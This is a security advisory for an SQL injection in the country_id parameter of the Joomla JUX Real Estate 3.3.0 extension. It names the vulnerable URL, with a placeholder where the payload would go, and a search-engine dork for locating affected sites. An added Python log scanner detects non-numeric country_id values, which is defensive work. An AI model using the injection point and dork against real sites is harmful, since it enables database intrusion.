Joomla JUX Real Estate 3.3.0 SQL Injection

2018.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################
#Title: Joomla! JUX Real Estate 3.3.0 - SQL injection
#Credit: Bilal KARDADOU
#Vendor: https://joomlaux.com
#URL: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jux-real-estate/
#Product: 'Joomla! JUX Real Estate 3.3.0'
#Developer: JoomlaUX
#Extension type: Plugin
#Last updated: Oct 30 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: inurl:"index.php?option=com_jux_real_estate"
################################################
#
# Description:
# JUX Real Estate is a JOOMLA component designed to fit a multitude of real estate related needs, and it is developed by JoomlaUX team.
#
#
# --Method=GET -p [country_id]
#
# -u " http://127.0.0.1/realestate/index.php?option=com_jux_real_estate&view=realties&Itemid=148&title=a&price_slider_lower=28607&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=0&cat_id=0&country_id=[SQLI]&locstate=&beds=0&agent_id=&baths=0&jp_yearbuilt=&button=Search "
#
# PoC:
# https://prnt.sc/hw0u6q
#
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################
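
A defensive check for the parameter named in the advisory, added here as an example and not part of the original advisory: it scans web access-log lines for requests to com_jux_real_estate whose country_id is not a plain number. It assumes combined-format access logs and that a legitimate country_id is either empty or a numeric ID; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COMPONENT = "com_jux_real_estate"    # component named in the advisory
PARAM = "country_id"                 # parameter named in the advisory
NUMERIC_RE = re.compile(r"[0-9]*")   # assumption: a legitimate value is empty or a numeric ID


def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for component requests with a non-numeric country_id."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a recognisable request line
        # parse_qs URL-decodes values, so encoded quotes and spaces are seen in clear text
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if COMPONENT not in query.get("option", []):
            continue  # request is for a different component
        for value in query.get(PARAM, []):
            if not NUMERIC_RE.fullmatch(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jan/2018:10:00:01 +0000] "GET /realestate/index.php'
    '?option=com_jux_real_estate&view=realties&country_id=12&beds=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Jan/2018:10:00:07 +0000] "GET /realestate/index.php'
    '?option=com_jux_real_estate&view=realties&country_id=12%27&beds=0 HTTP/1.1" 500 310',
    '203.0.113.9 - - [05/Jan/2018:10:00:09 +0000] "GET /realestate/index.php'
    '?option=com_jux_real_estate&view=realties&country_id=&beds=0 HTTP/1.1" 200 5090',
    '203.0.113.7 - - [05/Jan/2018:10:00:12 +0000] "GET /index.php'
    '?option=com_content&country_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: non-numeric {PARAM}={value!r}")
```

The same numeric-only rule can be enforced in front of the site (for example in a WAF or reverse-proxy rule) until the extension itself is fixed or removed.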


Copyright 2018, cxsecurity.com

 
